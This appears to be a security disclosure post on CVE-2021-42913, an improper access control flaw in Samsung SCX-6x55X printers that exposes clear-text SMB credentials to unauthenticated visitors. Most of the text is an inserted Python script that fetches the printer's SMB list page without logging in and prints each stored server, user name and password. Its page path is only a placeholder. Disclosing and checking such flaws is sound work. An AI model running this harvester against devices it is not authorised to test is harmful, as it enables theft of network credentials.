Samsung Printer SCX-6X55X Improper Access Control (CVE-2021-42913)

Windsor Moreira
Dec 17, 2021


The SyncThru Web Service on Samsung SCX-6x55X series printers is affected by an improper access control vulnerability: pages that should be reserved for the administrator can be reached without logging in. This permits an unauthenticated attacker to obtain the list of configured SMB users together with their passwords in clear text.

These multifunction printers, the Samsung SCX-6X55X in particular, can scan a document and send the scanned file directly to a file server over SMB, provided that SMB users (server entries with credentials) have been registered beforehand. Registering or modifying those users is only possible when you are logged in as administrator.

SMB server list with some entries filled in.

Even without authenticating, you can open an SMB server list entry...

Setup of user Giddeon.

... and still read the clear-text password by inspecting the page's source code: the password field is masked on screen, but its value is present in the HTML.

User Giddeon's password.

In some scenarios it will be impractical to go through the entries one by one for each user. Instead, you can download (export) the configuration of the SMB server entries, which contains the credentials in plain text.

I wrote a simple Python script using the requests library as a proof of concept. You can access it by clicking here.

Code to exploit.
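As an added example (this is not the author's script, which used the requests library; this one uses only the Python standard library so it runs offline), here is the check I would script for this finding: an unauthenticated GET of the SMB server list page, followed by a parse of the form inputs that recovers each entry's server, user name and password from the value attributes, which is exactly what "view source" reveals. The page path `SMB_LIST_PATH`, the input field names matched by `FIELD_PATTERNS` and the sample HTML are my assumptions, not taken from the post or the firmware; read the real ones from the page source of a device you are authorised to test.

```python
# Added example for checking a CVE-2021-42913 style exposure. This is NOT the
# author's proof-of-concept script, and the URL path below is a PLACEHOLDER,
# not a path taken from the original post or from the printer's firmware.
import re
import sys
import urllib.error
import urllib.request
from html.parser import HTMLParser

# ASSUMPTION: path of the SyncThru SMB server list page. It is not given on
# the page; take it from the address bar / page source of a device you are
# authorised to test.
SMB_LIST_PATH = "/PLACEHOLDER/smb-server-list"

# Heuristic field-name patterns (assumed, not the real field names). They are
# checked in this order so that a name such as "smbServerPass1" is classified
# as a password rather than as a server field.
FIELD_PATTERNS = (
    ("password", re.compile(r"pass", re.I)),
    ("user", re.compile(r"user|login", re.I)),
    ("server", re.compile(r"server|host|addr", re.I)),
)


class InputCollector(HTMLParser):
    """Collects (name, value) of every <input> tag in document order.

    A type="password" input is masked on screen, but its value attribute is
    plain text in the HTML, which is what inspecting the source exposes.
    """

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "input":
            a = dict(attrs)
            self.inputs.append((a.get("name") or "", a.get("value") or ""))


def extract_smb_entries(html):
    """Group the form inputs of the SMB server list into one dict per entry.

    A new entry starts whenever a field kind that was already seen appears
    again. Entries with an empty user name (unused slots, login forms) are
    dropped so that a login page is never reported as a credential.
    """
    collector = InputCollector()
    collector.feed(html)
    entries, current = [], {}
    for name, value in collector.inputs:
        for key, pattern in FIELD_PATTERNS:
            if pattern.search(name):
                if key in current:
                    entries.append(current)
                    current = {}
                current[key] = value
                break
    if current:
        entries.append(current)
    return [e for e in entries if e.get("user")]


def assess(html):
    """Return (verdict, entries) for the body of an unauthenticated GET."""
    entries = extract_smb_entries(html)
    if entries:
        return "VULNERABLE: SMB credentials readable without login", entries
    return "NOT EXPOSED: login enforced, patched firmware, or wrong path", []


def fetch_unauthenticated(base_url, path=SMB_LIST_PATH, timeout=10):
    """GET the page with no cookie or credential; returns (status, body)."""
    req = urllib.request.Request(base_url.rstrip("/") + path,
                                 headers={"User-Agent": "smb-list-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


# Constructed sample of what the SMB server list HTML might look like; the
# hosts and passwords are made up, the user "giddeon" is taken from the post.
SAMPLE_HTML = """<html><body><form>
<tr><td><input type="text" name="smbServerAddr1" value="10.0.0.5"></td>
    <td><input type="text" name="smbServerUser1" value="giddeon"></td>
    <td><input type="password" name="smbServerPass1" value="S3cret!"></td></tr>
<tr><td><input type="text" name="smbServerAddr2" value="files.corp.local"></td>
    <td><input type="text" name="smbServerUser2" value="scanner"></td>
    <td><input type="password" name="smbServerPass2" value="Scan2021"></td></tr>
<tr><td><input type="text" name="smbServerAddr3" value=""></td>
    <td><input type="text" name="smbServerUser3" value=""></td>
    <td><input type="password" name="smbServerPass3" value=""></td></tr>
</form></body></html>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        status, body = fetch_unauthenticated(sys.argv[1])
        print("HTTP", status)
    else:
        body = SAMPLE_HTML  # offline demonstration on the constructed sample
    verdict, found = assess(body)
    print(verdict)
    for entry in found:
        print("  %s  %s:%s" % (entry.get("server", "?"), entry["user"],
                               entry.get("password", "")))
```

Run it with the printer's base URL as the only argument for a live check (it sends no cookie and no credential, so any credentials it prints were readable by anyone on the network); with no argument it parses the embedded sample. A patched device, or a wrong path, yields the "NOT EXPOSED" verdict because a login form carries empty user fields and is filtered out.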

The exported SMB entries will look like this.

SMB server list.
Proof of concept video.

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42913

NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-42913
